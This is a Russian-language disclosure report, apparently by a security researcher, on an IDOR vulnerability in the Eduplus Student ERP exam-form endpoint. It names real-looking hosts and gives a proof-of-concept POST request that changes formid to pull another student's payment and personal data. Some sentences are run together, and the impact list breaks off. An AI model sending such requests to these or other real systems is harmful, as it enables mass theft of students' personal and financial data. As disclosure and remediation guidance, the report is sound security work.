
Подробный отчет об исследовании уязвимости IDOR в Eduplus Student ERP, включающий технический анализ, PoC, оценку воздействия и рекомендации по устранению.
Исследователь: Винай Шарма
В данном отчете описывается уязвимость высокой степени серьезности, обнаруженная в платформе Eduplus Student ERP, в частности в студенческом портале обучающегося (learnerapi.pceterp.in). Приложение подвержено универсальной небезопасной прямой ссылке на объект (IDOR) в конечной точке подачи экзаменационной формы, что позволяет любому аутентифицированному пользователю (студенту) получать конфиденциальные персональные и финансовые данные любого другого студента путем манипулирования идентификаторами форм.
Уязвимость позволяет осуществлять массовый сбор данных о студентах, включая персональные данные (PII) и подробные журналы аудита финансовых транзакций.
learnerapi.pceterp.in, learner.zealerp.in, learner.despu.edu.in и др.POST /ExamForm/viewSubmitExamFormCVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N)Уязвимость находится в конечной точке viewSubmitExamForm. Сервер полагается на два параметра, предоставляемых клиентом, для идентификации записи, которую необходимо получить:
{"formid": "XXXXX"}Router-Path: /view-pcu-exam-form/XXXXXformid. Перебирая числовые идентификаторы, злоумышленник может получить доступ к записям других студентов.Стандартный POST-запрос к уязвимой конечной точке с измененным formid возвращает конфиденциальные данные студента.
Запрос:
POST /ExamForm/viewSubmitExamForm HTTP/2
Host: learnerapi.pceterp.in
Content-Type: application/json
Router-Path: /view-pcu-exam-form/28984
... (Authenticated Headers) ...
{"formid":"28984"}
Ответ (Сводка утекших данных):
{
"status": "200",
"examFormname": "B.Tech - Sem VI - Regular",
"receipt_no": "REC/2023/54321",
"feespaiddate": "2023-10-15",
"ispaymentdone": {
"username": "[email protected]",
"received_amount": "1500.0",
"updation_ip_address": "103.x.x.x",
"erp_transaction_id": "ERP_998877",
"bank_transaction_id": "BANK_ABC123",
"paymentgateway_transaction_id": "PG_XYZ789",
"learner": {
"id": "12345"
}
}
}





Загрузка Idorpoc.mp4…
Успешная эксплуатация данной уязвимости позволяет:
formid принадлежит learnerid, связанному с активной сессией. Никогда не доверяйте параметрам formid или Router-Path без проверки по токену аутентифицированной сессии.